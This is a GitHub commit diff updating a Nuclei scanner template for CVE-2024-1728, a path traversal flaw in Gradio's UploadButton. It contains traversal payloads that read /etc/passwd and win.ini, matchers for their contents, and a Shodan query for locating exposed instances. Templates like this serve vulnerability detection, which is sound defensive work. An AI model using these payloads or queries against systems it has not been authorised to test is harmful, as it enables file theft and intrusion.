minor update

patch-4
Dhiyaneshwaran 2024-06-16 06:06:45 +05:30 committed by GitHub
parent 6b057d4926
commit 62463135df
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 25 additions and 26 deletions

View File

@ -1,13 +1,13 @@
id: CVE-2024-1728
info:
name: Local File Inclusion in Gradio
name: Gradio > 4.19.1 UploadButton - Path Traversal
author: isacaya
severity: high
description: |
Improper validation of user-supplied input in the UploadButton component leads to an LFI vulnerability.
gradio-app/gradio is vulnerable to a local file inclusion vulnerability due to improper validation of user-supplied input in the UploadButton component.
impact: |
An attacker would be able to view the contents of a file on the computer.
Attackers can exploit this vulnerability to read arbitrary files on the filesystem, such as private SSH keys, by manipulating the file path in the request to the `/queue/join` endpoint. This issue could potentially lead to remote code execution. The vulnerability is present in the handling of file upload paths, allowing attackers to redirect file uploads to unintended locations on the server.
remediation: |
Update to version 4.19.2.
reference:
@ -18,11 +18,14 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-1728
cwe-id: CWE-22
epss-score: 0.00044
epss-percentile: 0.10164
metadata:
vendor: Gradio
product: Gradio
shodan-query: title:"Gradio"
tags: cve,cve2024,lfi,Gradio,traversal
vendor: gradio
product: gradio
shodan-query: html:"__gradio_mode__"
tags: cve,cve2024,lfi,gradio,intrusive
http:
- raw:
@ -46,28 +49,24 @@ http:
- type: regex
internal: true
regex:
- "C:.*\\win\\.ini"
- "/tmp/gradio/.*/passwd"
- "C:.*\\win\\.ini"
name: extracted_path
stop-at-first-match: true
matchers-condition: or
matchers:
- type: dsl
dsl:
- "regex('root:.*:0:0:', body)"
- "status_code == 200"
condition: and
- type: dsl
dsl:
- "contains(body, 'bit app support')"
- "contains(body, 'fonts')"
- "contains(body, 'extensions')"
- "status_code == 200"
condition: and
payloads:
path:
- /etc/passwd
- /windows/win.ini
- /windows/win.ini
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- "\\[(font|extension|file)s\\]"
condition: or
- type: status
status:
- 200